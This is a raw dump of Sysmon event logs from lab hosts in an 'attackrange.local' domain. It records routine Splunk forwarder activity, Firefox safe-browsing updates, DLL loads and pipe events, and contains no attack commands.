18141800x800000000000000057350507Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:10.553{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350506Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:10.553{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057350505Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:10.553{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057350504Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:19:10.553{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057350503Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.515{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadata2021-11-12 12:19:09.227 23542300x800000000000000057350502Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.500{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=DFB4DAA501A3CFBD25D68591A665C859,SHA256=268132EF4B1977DE86EC57120642417C6C46B057573CA17012F2236549FDD876falsetrue 11241100x800000000000000057350501Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.500{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpset2021-11-12 12:19:10.500 23542300x800000000000000057350500Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.500{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x800000000000000057350499Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.500{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpset2021-11-12 12:19:10.500 11241100x800000000000000057350498Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.500{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto.metadata2021-11-12 12:19:09.191 23542300x800000000000000057350497Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.500{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=3E01CB8FF62235915E7D139DA52640D4,SHA256=856B42F8E7265F1B2A8EAC14D2BA6E89DA8EBEFB17A067159B3A0118A80EA1F3falsetrue 11241100x800000000000000057350496Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.484{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpset2021-11-12 12:19:10.484 23542300x800000000000000057350495Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.484{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x800000000000000057350494Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.484{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpset2021-11-12 12:19:10.484 11241100x800000000000000057350493Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.468{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto.metadata2021-11-12 12:19:09.191 23542300x800000000000000057350492Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.468{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=F4BE6F7B57CD8FC1AF3248C8A20627CC,SHA256=1CFFFCC2F155167AD174F00708C70E467AABB183D8858A12D34A7FD359F4DFE7falsetrue 11241100x800000000000000057350491Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.428{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpset2021-11-12 12:19:10.427 23542300x800000000000000057350490Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.428{8B6011A9-22EA-6170-2B5F-01000000F101}5544ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x800000000000000057350489Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.427{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpset2021-11-12 12:19:10.427 354300x800000000000000057350488Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:40.576{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-469.attackrange.local54576-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 534500x800000000000000057350487Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.024{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057350486Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.022{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057350485Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.021{8B6011A9-5BBD-618E-65F3-04000000F101}8236236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350484Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.008{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057350483Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:10.008{8B6011A9-5BBD-618E-65F3-04000000F101}8236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 23542300x800000000000000021219933Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.534{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=007CAD9D067274D87998351567F7CEF8,SHA256=D4351F97143CD4A0C0F3E5480FFFDFCC202A800EDEDB64C4A6A259BD49D86841,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219932Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.394{AD5E2759-5BBE-618E-1ACE-08000000F101}43483188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219931Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.206{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5BBE-618E-1ACE-08000000F101}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219930Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.206{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219929Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.206{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219928Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.206{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219927Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.206{AD5E2759-5432-6143-0500-00000000F101}4122832C:\Windows\system32\csrss.exe{AD5E2759-5BBE-618E-1ACE-08000000F101}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219926Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.206{AD5E2759-5433-6143-0C00-00000000F101}7325560C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219925Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.206{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5BBE-618E-1ACE-08000000F101}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219924Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:10.191{AD5E2759-5BBE-618E-1ACE-08000000F101}4348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219953Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.925{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8189431B6D2913F1A21EF870F8AEC8A3,SHA256=CBA72A8F951B03C5936A0EF10F850740C72BFCB6D7467384478E9A94891EC8C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219952Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:11.690{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC4A035FDECB64833161AA0B9735D28,SHA256=984E8E81941728A746A6E8EACB250809AFF6CF16228A44B03D8C0B932C278F5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057350733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057350732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057350731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057350730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057350729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057350728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057350727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057350726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057350725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057350724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.968{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057350723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057350722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057350721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:11.953{8B6011A9-5BBF-618E-68F3-04000000F101}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 